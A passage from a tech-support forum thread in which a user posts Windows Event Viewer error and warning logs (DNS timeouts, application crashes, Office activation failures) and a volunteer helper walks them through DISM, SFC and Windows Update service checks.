Log: 'System' Date/Time: 25/11/2019 19:17:27
Type: Warning Category: 1014
Event: 1014 Source: Microsoft-Windows-DNS-Client
Name resolution for the name detectportal.firefox.com timed out after none of the configured DNS servers responded.

Log: 'System' Date/Time: 25/11/2019 19:17:25
Type: Warning Category: 1014
Event: 1014 Source: Microsoft-Windows-DNS-Client
Name resolution for the name detectportal.firefox.com timed out after none of the configured DNS servers responded.

Log: 'System' Date/Time: 25/11/2019 19:01:32
Type: Warning Category: 1014
Event: 1014 Source: Microsoft-Windows-DNS-Client
Name resolution for the name mail.yahoo.com timed out after none of the configured DNS servers responded.

Log: 'System' Date/Time: 25/11/2019 19:01:03
Type: Warning Category: 0
Event: 4231 Source: Tcpip
A request to allocate an ephemeral port number from the global TCP port space has failed due to all such ports being in use.

Log: 'System' Date/Time: 25/11/2019 16:39:59
Type: Warning Category: 0
Event: 11 Source: Microsoft-Windows-Wininit
Custom dynamic link libraries are being loaded for every application. The system administrator should review the list of libraries to ensure they are related to trusted applications. Please visit http://support.microsoft.com/kb/197571for more information.

Log: 'System' Date/Time: 25/11/2019 11:10:26
Type: Warning Category: 0
Event: 8021 Source: BROWSER
The browser service was unable to retrieve a list of servers from the browser master \\MIXPC on the network \Device\NetBT_Tcpip_{2A8E95F9-250A-4CDC-8D08-F661E3F2A913}.    Browser master: \\MIXPC  Network: \Device\NetBT_Tcpip_{2A8E95F9-250A-4CDC-8D08-F661E3F2A913}    This event may be caused by a temporary loss of network connectivity. If this message appears again, verify that the server is still connected to the network. The return code is in the Data text box.

Log: 'System' Date/Time: 25/11/2019 10:53:59
Type: Warning Category: 0
Event: 11 Source: Microsoft-Windows-Wininit
Custom dynamic link libraries are being loaded for every application. The system administrator should review the list of libraries to ensure they are related to trusted applications. Please visit http://support.microsoft.com/kb/197571for more information.

Log: 'System' Date/Time: 24/11/2019 23:38:26
Type: Warning Category: 0
Event: 11 Source: Microsoft-Windows-Wininit
Custom dynamic link libraries are being loaded for every application. The system administrator should review the list of libraries to ensure they are related to trusted applications. Please visit http://support.microsoft.com/kb/197571for more information.
_____________________________________________

 

VEW second result (Application):

 

Vino's Event Viewer v01c run on Windows 7 in English
Report run at 26/11/2019 18:09:28

Note: All dates below are in the format dd/mm/yyyy

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
'Application' Log - Critical Type
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
'Application' Log - Error Type
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Log: 'Application' Date/Time: 26/11/2019 15:48:44
Type: Error Category: 0
Event: 78 Source: SideBySide
Activation context generation failed for "C:\Global Prime - MetaTrader 4\terminal.exe".Error in manifest or policy file "" on line . A component version required by the application conflicts with another component version already active. Conflicting components are:. Component 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_fb429a5930656358.manifest. Component 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_42efd13044e18c5e.manifest.

Log: 'Application' Date/Time: 26/11/2019 15:48:11
Type: Error Category: 0
Event: 78 Source: SideBySide
Activation context generation failed for "C:\Global Prime - MetaTrader 4\terminal.exe".Error in manifest or policy file "" on line . A component version required by the application conflicts with another component version already active. Conflicting components are:. Component 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_fb429a5930656358.manifest. Component 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_42efd13044e18c5e.manifest.

Log: 'Application' Date/Time: 26/11/2019 11:50:28
Type: Error Category: 0
Event: 78 Source: SideBySide
Activation context generation failed for "C:\Global Prime - MetaTrader 4\terminal.exe".Error in manifest or policy file "" on line . A component version required by the application conflicts with another component version already active. Conflicting components are:. Component 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_fb429a5930656358.manifest. Component 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_42efd13044e18c5e.manifest.

Log: 'Application' Date/Time: 26/11/2019 11:49:59
Type: Error Category: 0
Event: 78 Source: SideBySide
Activation context generation failed for "C:\Global Prime - MetaTrader 4\terminal.exe".Error in manifest or policy file "" on line . A component version required by the application conflicts with another component version already active. Conflicting components are:. Component 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_fb429a5930656358.manifest. Component 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_42efd13044e18c5e.manifest.

Log: 'Application' Date/Time: 26/11/2019 11:40:02
Type: Error Category: 0
Event: 78 Source: SideBySide
Activation context generation failed for "C:\Global Prime - MetaTrader 4\terminal.exe".Error in manifest or policy file "" on line . A component version required by the application conflicts with another component version already active. Conflicting components are:. Component 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_fb429a5930656358.manifest. Component 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_42efd13044e18c5e.manifest.

Log: 'Application' Date/Time: 26/11/2019 11:39:32
Type: Error Category: 0
Event: 78 Source: SideBySide
Activation context generation failed for "C:\Global Prime - MetaTrader 4\terminal.exe".Error in manifest or policy file "" on line . A component version required by the application conflicts with another component version already active. Conflicting components are:. Component 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_fb429a5930656358.manifest. Component 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_42efd13044e18c5e.manifest.

Log: 'Application' Date/Time: 26/11/2019 11:38:51
Type: Error Category: 100
Event: 1000 Source: Application Error
Faulting application name: reaper_host32.exe, version: 0.0.0.0, time stamp: 0x5dd47f93 Faulting module name: QuickTime.qts, version: 7.79.80.95, time stamp: 0x5668a2c5 Exception code: 0xc0000005 Fault offset: 0x0001aed4 Faulting process id: 0x3f60 Faulting application start time: 0x01d5a43fe7d74f43 Faulting application path: C:\Program Files\REAPER (x64)\Plugins\reaper_host32.exe Faulting module path: C:\Program Files (x86)\QuickTime\QTSystem\QuickTime.qts Report Id: 4fe66871-8230-48aa-ab8d-ff6dcf8419f1 Faulting package full name:  Faulting package-relative application ID:

Log: 'Application' Date/Time: 26/11/2019 10:49:35
Type: Error Category: 0
Event: 78 Source: SideBySide
Activation context generation failed for "C:\Global Prime - MetaTrader 4\terminal.exe".Error in manifest or policy file "" on line . A component version required by the application conflicts with another component version already active. Conflicting components are:. Component 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_fb429a5930656358.manifest. Component 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_42efd13044e18c5e.manifest.

Log: 'Application' Date/Time: 26/11/2019 07:38:59
Type: Error Category: 0
Event: 78 Source: SideBySide
Activation context generation failed for "C:\Global Prime - MetaTrader 4\terminal.exe".Error in manifest or policy file "" on line . A component version required by the application conflicts with another component version already active. Conflicting components are:. Component 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_fb429a5930656358.manifest. Component 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_42efd13044e18c5e.manifest.

Log: 'Application' Date/Time: 26/11/2019 07:38:29
Type: Error Category: 0
Event: 78 Source: SideBySide
Activation context generation failed for "C:\Global Prime - MetaTrader 4\terminal.exe".Error in manifest or policy file "" on line . A component version required by the application conflicts with another component version already active. Conflicting components are:. Component 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_fb429a5930656358.manifest. Component 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_42efd13044e18c5e.manifest.

Log: 'Application' Date/Time: 25/11/2019 19:22:36
Type: Error Category: 0
Event: 78 Source: SideBySide
Activation context generation failed for "C:\Global Prime - MetaTrader 4\terminal.exe".Error in manifest or policy file "" on line . A component version required by the application conflicts with another component version already active. Conflicting components are:. Component 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_fb429a5930656358.manifest. Component 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_42efd13044e18c5e.manifest.

Log: 'Application' Date/Time: 25/11/2019 19:22:05
Type: Error Category: 0
Event: 78 Source: SideBySide
Activation context generation failed for "C:\Global Prime - MetaTrader 4\terminal.exe".Error in manifest or policy file "" on line . A component version required by the application conflicts with another component version already active. Conflicting components are:. Component 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_fb429a5930656358.manifest. Component 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_42efd13044e18c5e.manifest.

Log: 'Application' Date/Time: 25/11/2019 16:40:34
Type: Error Category: 0
Event: 78 Source: SideBySide
Activation context generation failed for "C:\Global Prime - MetaTrader 4\terminal.exe".Error in manifest or policy file "" on line . A component version required by the application conflicts with another component version already active. Conflicting components are:. Component 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_fb429a5930656358.manifest. Component 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_42efd13044e18c5e.manifest.

Log: 'Application' Date/Time: 25/11/2019 16:40:03
Type: Error Category: 0
Event: 78 Source: SideBySide
Activation context generation failed for "C:\Global Prime - MetaTrader 4\terminal.exe".Error in manifest or policy file "" on line . A component version required by the application conflicts with another component version already active. Conflicting components are:. Component 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_fb429a5930656358.manifest. Component 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_42efd13044e18c5e.manifest.

Log: 'Application' Date/Time: 25/11/2019 15:59:34
Type: Error Category: 0
Event: 78 Source: SideBySide
Activation context generation failed for "C:\Global Prime - MetaTrader 4\terminal.exe".Error in manifest or policy file "" on line . A component version required by the application conflicts with another component version already active. Conflicting components are:. Component 1: C:\WINDOWS\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_fb429a5930656358.manifest. Component 2: C:\WINDOWS\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_42efd13044e18c5e.manifest.

Log: 'Application' Date/Time: 25/11/2019 15:51:31
Type: Error Category: 0
Event: 78 Source: SideBySide
Activation context generation failed for "C:\Global Prime - MetaTrader 4\terminal.exe".Error in manifest or policy file "" on line . A component version required by the application conflicts with another component version already active. Conflicting components are:. Component 1: C:\WINDOWS\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_fb429a5930656358.manifest. Component 2: C:\WINDOWS\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_42efd13044e18c5e.manifest.

Log: 'Application' Date/Time: 25/11/2019 15:33:49
Type: Error Category: 100
Event: 1000 Source: Application Error
Faulting application name: reaper_host32.exe, version: 0.0.0.0, time stamp: 0x5dd47f93 Faulting module name: QuickTime.qts, version: 7.79.80.95, time stamp: 0x5668a2c5 Exception code: 0xc0000005 Fault offset: 0x0001aed4 Faulting process id: 0x4758 Faulting application start time: 0x01d5a39f77446ce6 Faulting application path: C:\Program Files\REAPER (x64)\Plugins\reaper_host32.exe Faulting module path: C:\Program Files (x86)\QuickTime\QTSystem\QuickTime.qts Report Id: 4a3bc0ce-a993-49e0-923d-f66090644848 Faulting package full name:  Faulting package-relative application ID:

Log: 'Application' Date/Time: 25/11/2019 15:12:10
Type: Error Category: 0
Event: 78 Source: SideBySide
Activation context generation failed for "C:\Global Prime - MetaTrader 4\terminal.exe".Error in manifest or policy file "" on line . A component version required by the application conflicts with another component version already active. Conflicting components are:. Component 1: C:\WINDOWS\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_fb429a5930656358.manifest. Component 2: C:\WINDOWS\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_42efd13044e18c5e.manifest.

Log: 'Application' Date/Time: 25/11/2019 14:46:32
Type: Error Category: 100
Event: 1000 Source: Application Error
Faulting application name: reaper_host32.exe, version: 0.0.0.0, time stamp: 0x5dd47f93 Faulting module name: QuickTime.qts, version: 7.79.80.95, time stamp: 0x5668a2c5 Exception code: 0xc0000005 Fault offset: 0x0001aed4 Faulting process id: 0x266c Faulting application start time: 0x01d5a39cb2d4865b Faulting application path: C:\Program Files\REAPER (x64)\Plugins\reaper_host32.exe Faulting module path: C:\Program Files (x86)\QuickTime\QTSystem\QuickTime.qts Report Id: e798a86e-d820-481a-b7ea-b5bc0e3be195 Faulting package full name:  Faulting package-relative application ID:

Log: 'Application' Date/Time: 25/11/2019 14:29:08
Type: Error Category: 0
Event: 78 Source: SideBySide
Activation context generation failed for "C:\Global Prime - MetaTrader 4\terminal.exe".Error in manifest or policy file "" on line . A component version required by the application conflicts with another component version already active. Conflicting components are:. Component 1: C:\WINDOWS\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_fb429a5930656358.manifest. Component 2: C:\WINDOWS\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_42efd13044e18c5e.manifest.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
'Application' Log - Warning Type
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Log: 'Application' Date/Time: 26/11/2019 15:48:18
Type: Warning Category: 0
Event: 8233 Source: Microsoft-Windows-Security-SPP
The rules engine reported a failed VL activation attempt. Reason:0x8007007B AppId = 0ff1ce15-a989-479d-af46-f275c6370663, SkuId = d450596f-894d-49e0-966a-fd39ed4c4c64 Trigger=NetworkAvailable

Log: 'Application' Date/Time: 26/11/2019 15:48:15
Type: Warning Category: 0
Event: 8233 Source: Microsoft-Windows-Security-SPP
The rules engine reported a failed VL activation attempt. Reason:0x8007007B AppId = 0ff1ce15-a989-479d-af46-f275c6370663, SkuId = d450596f-894d-49e0-966a-fd39ed4c4c64 Trigger=UserLogon(1)

Log: 'Application' Date/Time: 26/11/2019 13:40:38
Type: Warning Category: 0
Event: 8233 Source: Microsoft-Windows-Security-SPP
The rules engine reported a failed VL activation attempt. Reason:0x8007007B AppId = 0ff1ce15-a989-479d-af46-f275c6370663, SkuId = d450596f-894d-49e0-966a-fd39ed4c4c64 Trigger=NetworkAvailable

Log: 'Application' Date/Time: 26/11/2019 13:40:30
Type: Warning Category: 0
Event: 8233 Source: Microsoft-Windows-Security-SPP
The rules engine reported a failed VL activation attempt. Reason:0x8007007B AppId = 0ff1ce15-a989-479d-af46-f275c6370663, SkuId = d450596f-894d-49e0-966a-fd39ed4c4c64 Trigger=NetworkAvailable

Log: 'Application' Date/Time: 26/11/2019 11:49:59
Type: Warning Category: 0
Event: 8233 Source: Microsoft-Windows-Security-SPP
The rules engine reported a failed VL activation attempt. Reason:0x8007007B AppId = 0ff1ce15-a989-479d-af46-f275c6370663, SkuId = d450596f-894d-49e0-966a-fd39ed4c4c64 Trigger=UserLogon(1)

Log: 'Application' Date/Time: 26/11/2019 11:49:53
Type: Warning Category: 0
Event: 8233 Source: Microsoft-Windows-Security-SPP
The rules engine reported a failed VL activation attempt. Reason:0x8007007B AppId = 0ff1ce15-a989-479d-af46-f275c6370663, SkuId = d450596f-894d-49e0-966a-fd39ed4c4c64 Trigger=NetworkAvailable

Log: 'Application' Date/Time: 26/11/2019 11:39:34
Type: Warning Category: 0
Event: 8233 Source: Microsoft-Windows-Security-SPP
The rules engine reported a failed VL activation attempt. Reason:0x8007007B AppId = 0ff1ce15-a989-479d-af46-f275c6370663, SkuId = d450596f-894d-49e0-966a-fd39ed4c4c64 Trigger=UserLogon(1)

Log: 'Application' Date/Time: 26/11/2019 11:39:27
Type: Warning Category: 0
Event: 8233 Source: Microsoft-Windows-Security-SPP
The rules engine reported a failed VL activation attempt. Reason:0x8007007B AppId = 0ff1ce15-a989-479d-af46-f275c6370663, SkuId = d450596f-894d-49e0-966a-fd39ed4c4c64 Trigger=NetworkAvailable

Log: 'Application' Date/Time: 26/11/2019 07:38:40
Type: Warning Category: 0
Event: 8233 Source: Microsoft-Windows-Security-SPP
The rules engine reported a failed VL activation attempt. Reason:0x8007007B AppId = 0ff1ce15-a989-479d-af46-f275c6370663, SkuId = d450596f-894d-49e0-966a-fd39ed4c4c64 Trigger=NetworkAvailable

Log: 'Application' Date/Time: 26/11/2019 07:38:37
Type: Warning Category: 0
Event: 8233 Source: Microsoft-Windows-Security-SPP
The rules engine reported a failed VL activation attempt. Reason:0x8007007B AppId = 0ff1ce15-a989-479d-af46-f275c6370663, SkuId = d450596f-894d-49e0-966a-fd39ed4c4c64 Trigger=NetworkAvailable

Log: 'Application' Date/Time: 26/11/2019 07:38:34
Type: Warning Category: 0
Event: 8233 Source: Microsoft-Windows-Security-SPP
The rules engine reported a failed VL activation attempt. Reason:0x8007007B AppId = 0ff1ce15-a989-479d-af46-f275c6370663, SkuId = d450596f-894d-49e0-966a-fd39ed4c4c64 Trigger=UserLogon(2)

Log: 'Application' Date/Time: 25/11/2019 19:22:12
Type: Warning Category: 0
Event: 8233 Source: Microsoft-Windows-Security-SPP
The rules engine reported a failed VL activation attempt. Reason:0x8007007B AppId = 0ff1ce15-a989-479d-af46-f275c6370663, SkuId = d450596f-894d-49e0-966a-fd39ed4c4c64 Trigger=NetworkAvailable

Log: 'Application' Date/Time: 25/11/2019 19:22:10
Type: Warning Category: 0
Event: 8233 Source: Microsoft-Windows-Security-SPP
The rules engine reported a failed VL activation attempt. Reason:0x8007007B AppId = 0ff1ce15-a989-479d-af46-f275c6370663, SkuId = d450596f-894d-49e0-966a-fd39ed4c4c64 Trigger=UserLogon(1)

Log: 'Application' Date/Time: 25/11/2019 19:18:34
Type: Warning Category: 0
Event: 8233 Source: Microsoft-Windows-Security-SPP
The rules engine reported a failed VL activation attempt. Reason:0x8007007B AppId = 0ff1ce15-a989-479d-af46-f275c6370663, SkuId = d450596f-894d-49e0-966a-fd39ed4c4c64 Trigger=NetworkAvailable

Log: 'Application' Date/Time: 25/11/2019 19:17:24
Type: Warning Category: 0
Event: 8233 Source: Microsoft-Windows-Security-SPP
The rules engine reported a failed VL activation attempt. Reason:0x8007007B AppId = 0ff1ce15-a989-479d-af46-f275c6370663, SkuId = d450596f-894d-49e0-966a-fd39ed4c4c64 Trigger=NetworkAvailable

Log: 'Application' Date/Time: 25/11/2019 19:17:19
Type: Warning Category: 0
Event: 8233 Source: Microsoft-Windows-Security-SPP
The rules engine reported a failed VL activation attempt. Reason:0x8007267C AppId = 0ff1ce15-a989-479d-af46-f275c6370663, SkuId = d450596f-894d-49e0-966a-fd39ed4c4c64 Trigger=NetworkAvailable

Log: 'Application' Date/Time: 25/11/2019 19:17:17
Type: Warning Category: 0
Event: 8233 Source: Microsoft-Windows-Security-SPP
The rules engine reported a failed VL activation attempt. Reason:0x8007267C AppId = 0ff1ce15-a989-479d-af46-f275c6370663, SkuId = d450596f-894d-49e0-966a-fd39ed4c4c64 Trigger=NetworkAvailable

Log: 'Application' Date/Time: 25/11/2019 16:40:02
Type: Warning Category: 0
Event: 8233 Source: Microsoft-Windows-Security-SPP
The rules engine reported a failed VL activation attempt. Reason:0x8007007B AppId = 0ff1ce15-a989-479d-af46-f275c6370663, SkuId = d450596f-894d-49e0-966a-fd39ed4c4c64 Trigger=UserLogon(1)

Log: 'Application' Date/Time: 25/11/2019 16:39:57
Type: Warning Category: 0
Event: 8233 Source: Microsoft-Windows-Security-SPP
The rules engine reported a failed VL activation attempt. Reason:0x8007007B AppId = 0ff1ce15-a989-479d-af46-f275c6370663, SkuId = d450596f-894d-49e0-966a-fd39ed4c4c64 Trigger=NetworkAvailable

Log: 'Application' Date/Time: 25/11/2019 10:54:05
Type: Warning Category: 0
Event: 8233 Source: Microsoft-Windows-Security-SPP
The rules engine reported a failed VL activation attempt. Reason:0x8007007B AppId = 0ff1ce15-a989-479d-af46-f275c6370663, SkuId = d450596f-894d-49e0-966a-fd39ed4c4c64 Trigger=UserLogon(1)

 



#14
RKinner

    Malware Expert

  • Expert
  • 22,034 posts
  • MVP

Continuing is fine.  Try Dism again after running SFC and rebooting.  If it still fails with 1060:

The error

    1060 (0x424)
    The specified service does not exist as an installed service.

Search for services.msc and hit Enter.

This should open the Services window.  Do you see

Background Tasks Infrastructure Service  Running  Automatic

and

Windows Update  Running  Manual Triggered

There is a dism log at C:\windows\logs\DISM\dism.log

Copy and paste or attach it.

If you have trouble seeing it, tell Windows to let you see hidden files:

http://www.howtogeek...-windows-vista/
 



#15
spra

    Member

  • Topic Starter
  • Member
  • PipPip
  • 78 posts

I re-tried DISM and it stopped again at the same point with the message you described.

Then in Services I see the first one
Background Tasks Infrastructure Service Running  Automatic
but nothing like
Windows Update  Running  Manual Triggered
Instead I see
Windows Update Medic Service .... not running Manual.

The DISM log is too big to upload. It is 12.910 Kb. This is the message I get, even after enabling flash 9.
I am not sure that I will be able to copy it here either, because when I tried before, the app seemed to hang.
I will try, in my next reply, but if it fails what should I do?
 

